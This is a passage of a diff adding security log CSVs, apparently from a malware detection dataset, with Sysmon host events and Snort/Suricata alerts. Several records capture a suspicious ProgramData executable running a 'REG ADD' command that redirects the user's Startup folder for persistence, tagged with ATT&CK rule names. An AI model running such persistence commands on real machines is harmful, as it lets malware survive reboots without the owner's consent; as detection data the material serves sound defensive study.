+ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary +Details: C:\Windows\system32\cmd.exe /q /c del /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:50.300789600Z"",""eventRecordID"":""2112"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:50.287\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c del /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:50.287"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c del /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""" +"May 28, 2020 @ 12:16:17.528",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1112,ChangeStartupFolderPath +EventType: SetValue +UtcTime: 2020-05-28 12:16:13.505 +ProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00} +ProcessId: 6176 +Image: C:\Windows\SysWOW64\REG.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup +Details: C:\ProgramData\f64a428dfd""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:13.526455400Z"",""eventRecordID"":""1919"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1112,ChangeStartupFolderPath\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:13.505\r\nProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00}\r\nProcessId: 6176\r\nImage: C:\\Windows\\SysWOW64\\REG.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup\r\nDetails: C:\\ProgramData\\f64a428dfd\""""},""eventdata"":{""ruleName"":""T1112,ChangeStartupFolderPath"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:13.505"",""processGuid"":""{df9fc3d3-ab8d-5ecf-0000-00107d210a00}"",""processId"":""6176"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\REG.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup"",""details"":""C:\\\\ProgramData\\\\f64a428dfd""}}}","C:\\ProgramData\\f64a428dfd" +"May 28, 2020 @ 12:16:17.487",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:16:13.152 +ProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00} +ProcessId: 6176 +Image: C:\Windows\SysWOW64\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfd +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-ab70-5ecf-0000-00209bfb0300} +LogonId: 0x3FB9B +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587 +ParentProcessGuid: {df9fc3d3-ab8d-5ecf-0000-0010581d0a00} +ParentProcessId: 6148 +ParentImage: C:\ProgramData\f64a428dfd\cmualrc.exe +ParentCommandLine: ""C:\ProgramData\f64a428dfd\cmualrc.exe"" ""","REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:13.166409500Z"",""eventRecordID"":""1918"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:16:13.152\r\nProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00}\r\nProcessId: 6176\r\nImage: C:\\Windows\\SysWOW64\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-ab70-5ecf-0000-00209bfb0300}\r\nLogonId: 0x3FB9B\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587\r\nParentProcessGuid: {df9fc3d3-ab8d-5ecf-0000-0010581d0a00}\r\nParentProcessId: 6148\r\nParentImage: C:\\ProgramData\\f64a428dfd\\cmualrc.exe\r\nParentCommandLine: \""C:\\ProgramData\\f64a428dfd\\cmualrc.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:16:13.152"",""processGuid"":""{df9fc3d3-ab8d-5ecf-0000-00107d210a00}"",""processId"":""6176"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\"" /f /v Startup /t REG_SZ /d C:\\\\ProgramData\\\\f64a428dfd"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-ab70-5ecf-0000-00209bfb0300}"",""logonId"":""0x3fb9b"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587"",""parentProcessGuid"":""{df9fc3d3-ab8d-5ecf-0000-0010581d0a00}"",""parentProcessId"":""6148"",""parentImage"":""C:\\\\ProgramData\\\\f64a428dfd\\\\cmualrc.exe"",""parentCommandLine"":""\\\""C:\\\\ProgramData\\\\f64a428dfd\\\\cmualrc.exe\\\""""}}}", +"May 28, 2020 @ 12:15:56.228",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 28, 2020 @ 12:15:46.412",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 28, 2020 @ 12:15:05.636",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 28, 2020 @ 12:15:05.620",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 28, 2020 @ 12:11:29.200",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6520; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT SecurityServicesConfigured FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 28, 2020 @ 12:10:03.340",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1112,ChangeStartupFolderPath +EventType: SetValue +UtcTime: 2020-05-26 09:29:17.389 +ProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500} +ProcessId: 1052 +Image: C:\Windows\SysWOW64\REG.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup +Details: C:\ProgramData\f64a428dfd""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:29:17.396376800Z"",""eventRecordID"":""1487"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1112,ChangeStartupFolderPath\r\nEventType: SetValue\r\nUtcTime: 2020-05-26 09:29:17.389\r\nProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500}\r\nProcessId: 1052\r\nImage: C:\\Windows\\SysWOW64\\REG.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup\r\nDetails: C:\\ProgramData\\f64a428dfd\""""},""eventdata"":{""ruleName"":""T1112,ChangeStartupFolderPath"",""eventType"":""SetValue"",""utcTime"":""2020-05-26 09:29:17.389"",""processGuid"":""{df9fc3d3-e16d-5ecc-0000-00106b592500}"",""processId"":""1052"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\REG.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup"",""details"":""C:\\\\ProgramData\\\\f64a428dfd""}}}","C:\\ProgramData\\f64a428dfd" +"May 28, 2020 @ 12:10:03.324",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:29:17.214 +ProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500} +ProcessId: 1052 +Image: C:\Windows\SysWOW64\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfd +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587 +ParentProcessGuid: {df9fc3d3-e16d-5ecc-0000-00100c572500} +ParentProcessId: 6748 +ParentImage: C:\ProgramData\f64a428dfd\cmualrc.exe +ParentCommandLine: c:\programdata\f64a428dfd\cmualrc.exe""","REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:29:17.216880400Z"",""eventRecordID"":""1486"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:29:17.214\r\nProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500}\r\nProcessId: 1052\r\nImage: C:\\Windows\\SysWOW64\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587\r\nParentProcessGuid: {df9fc3d3-e16d-5ecc-0000-00100c572500}\r\nParentProcessId: 6748\r\nParentImage: C:\\ProgramData\\f64a428dfd\\cmualrc.exe\r\nParentCommandLine: c:\\programdata\\f64a428dfd\\cmualrc.exe\""""},""eventdata"":{""utcTime"":""2020-05-26 09:29:17.214"",""processGuid"":""{df9fc3d3-e16d-5ecc-0000-00106b592500}"",""processId"":""1052"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\"" /f /v Startup /t REG_SZ /d C:\\\\ProgramData\\\\f64a428dfd"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587"",""parentProcessGuid"":""{df9fc3d3-e16d-5ecc-0000-00100c572500}"",""parentProcessId"":""6748"",""parentImage"":""C:\\\\ProgramData\\\\f64a428dfd\\\\cmualrc.exe"",""parentCommandLine"":""c:\\\\programdata\\\\f64a428dfd\\\\cmualrc.exe""}}}", diff --git a/data/MW_6_NIDS.csv b/data/MW_6_NIDS.csv new file mode 100644 index 0000000..b0af6c1 --- /dev/null +++ b/data/MW_6_NIDS.csv @@ -0,0 +1,9 @@ +"@timestamp",message,"log.file.path" +"May 28, 2020 @ 12:17:07.096","05/28/2020-12:16:58.310591 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/suricata/fast.log" +"May 28, 2020 @ 12:17:07.096","05/28/2020-12:16:58.310591 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/suricata/fast.log" +"May 28, 2020 @ 12:16:47.095","05/28-12:16:45.942179 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/snort/alert.fast" +"May 28, 2020 @ 12:16:47.095","05/28-12:16:45.942179 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/snort/alert.fast" +"May 28, 2020 @ 12:11:46.980","05/28/2020-12:11:37.037033 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/suricata/fast.log" +"May 28, 2020 @ 12:11:46.980","05/28/2020-12:11:37.037033 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/suricata/fast.log" +"May 28, 2020 @ 12:11:36.979","05/28-12:11:30.822840 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/snort/alert.fast" +"May 28, 2020 @ 12:11:36.979","05/28-12:11:30.822840 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/snort/alert.fast" diff --git a/data/MW_7_HIDS_3.csv b/data/MW_7_HIDS_3.csv new file mode 100644 index 0000000..c8c7264 --- /dev/null +++ b/data/MW_7_HIDS_3.csv @@ -0,0 +1,22 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 28, 2020 @ 12:36:05.871",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +", +"May 28, 2020 @ 12:36:04.638",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '451281856a95784f3f631c6ed2dfd3d2' +New md5sum is : '99a30c0c876d598ceb808b943c81bfa8' +Old sha1sum was: 'ce278144ea52b95bdfabfb8c3a68a61d709530c4' +New sha1sum is : '71674028950e3a20d32dc6bd8fca028c5759741d' +", +"May 28, 2020 @ 12:36:04.624",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '8e9147c00e3845c0b79118bcdba05339' +New md5sum is : '47f3ce5d928e10eebf2c572e4242a131' +Old sha1sum was: '27fd277750d88f31b0a0405777373541ddaeabdf' +New sha1sum is : '92fd10acf94294026e1938c3ec692c3cb031e33b' +", +"May 28, 2020 @ 12:34:38.990",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 28, 2020 @ 12:34:26.839",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 28, 2020 @ 12:31:31.875",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6060; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryFullChargedCapacity; ResultCode = 0x80041010; PossibleCause = Unknown""",,,, diff --git a/data/MW_7_NIDS.csv b/data/MW_7_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_7_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_9_HIDS_1.csv b/data/MW_9_HIDS_1.csv new file mode 100644 index 0000000..cacf36c --- /dev/null +++ b/data/MW_9_HIDS_1.csv @@ -0,0 +1,469 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 7, 2020 @ 09:31:14.194",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:31:13.315",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 7, 2020 @ 09:31:09.787",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 7, 2020 @ 09:30:01.488",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : '7e38d7d48acba553e9b927a185580478' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '93c7740e06e3ad95b64cba0c84950355bbe16095' +" +"Apr 7, 2020 @ 09:30:01.472",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : 'e4d19d51bb57f6bbddefe526ef7a7eae' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '75b5499585597cca71a429fe77e729953593c698' +" +"Apr 7, 2020 @ 09:29:58.286",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:58.269",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:50.926",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 7, 2020 @ 09:29:50.895",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '40f25468dcd84290dd7a261b9ebe519b' +New md5sum is : 'b7a68a188bc32e74c5681ba9afece236' +Old sha1sum was: '59cbd60494640ca425146424a80456e3bf10847a' +New sha1sum is : 'a36f4c5a82f40650029849ab2f8acf8e87dbcdc2' +" +"Apr 7, 2020 @ 09:29:50.879",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '61a910cd0eb02db74956a0b4e2c32a83' +New md5sum is : '44a0c8dbeec3602d58be41d6d80c10ca' +Old sha1sum was: 'cd9fc634c8dc13de4676ed7f923cc356b262be96' +New sha1sum is : 'b8543c052715aee60c6b66b6084735a08bcbedae' +" +"Apr 7, 2020 @ 09:29:50.535",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '740b0c6a4541da11b8946fee541d4b2f' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : '09c2df703e77148e106a800bd664678d5372641a' +" +"Apr 7, 2020 @ 09:29:49.145",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '997c8620c2190b0bd117790258bc3703' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a01b5b53e6c6cf8c359de7ccd29c696d00b14c47' +" +"Apr 7, 2020 @ 09:29:48.488",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '64f0bed972f71b0351e53c0a12523580' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : 'afa9231adac28f47558168b1889d787b5c52f3e1' +" +"Apr 7, 2020 @ 09:29:48.238",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:48.222",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:48.113",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 